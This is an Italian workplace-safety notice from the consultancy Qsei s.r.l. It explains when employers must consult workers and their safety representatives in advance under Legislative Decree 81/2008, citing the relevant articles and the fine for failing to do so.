In molte occasioni si è riscontrato che le aziende non avevano provveduto alla CONSULTAZIONE PREVENTIVA dei lavoratori o del/dei Rappresentanti dei Lavoratori per la Sicurezza (RLS)/Rappresentanti dei Lavoratori per la Sicurezza Territoriale (RLST), secondo quanto previsto dal D.L.vo 81/2008.
Tale ”dimenticanza” può costare fino a 4.384 € (art. 29 del D.L.vo 81/2008).

Per quanto sopra, si ritiene di fare cosa utile ricordare i casi per i quali è necessario consultare preventivamente i lavoratori od i loro rappresentanti.

L’art. 15 del D.L.vo 81/2008, ai commi r) ed s), introduce il dovere della CONSULTAZIONE PREVENTIVA dei lavoratori (comma r) (Rappresentanti dei Lavoratori non eletti o designati), mentre il comma s) è riferito alla mancata CONSULTAZIONE PREVENTIVA dei Rappresentanti dei Lavoratori.

L’art. 29 descrive le modalità di effettuazione della valutazione dei rischi e stabilisce che le attività legate alla valutazione sono realizzate previa consultazione del Rappresentante dei Lavoratori per la Sicurezza. Articolo della norma sanzionato.

L’art. 50 b) prevede che il Rappresentante dei Lavoratori sia consultato preventivamente e tempestivamente in ordine a:

  • la valutazione dei rischi,
  • l’individuazione, la programmazione, la realizzazione e la verifica della prevenzione nella azienda,
  • alla designazione del responsabile e degli addetti al servizio di prevenzione,
  • all’attività di prevenzione incendi, di primo soccorso, di evacuazione dei luoghi di lavoro e del medico competente;
  • all’organizzazione della formazione.

L’art. 102 prevede la consultazione del rappresentante per la sicurezza prima dell’accettazione del piano di sicurezza e di coordinamento e delle modifiche significative apportate allo stesso.

L’art. 231 prevede la consultazione e partecipazione dei lavoratori alla valutazione del rischio chimico secondo quanto previsto dall’art. 50 su citato.

IL PERSONALE DI Qsei s.r.l. E’ A DISPOSIZIONE PER CHIARIMENTI E
PER ASSISTERE LE AZIENDE AD ESPLETARE GLI ADEMPIMENTI NECESSARI

document.currentScript.parentNode.insertBefore(s, document.currentScript);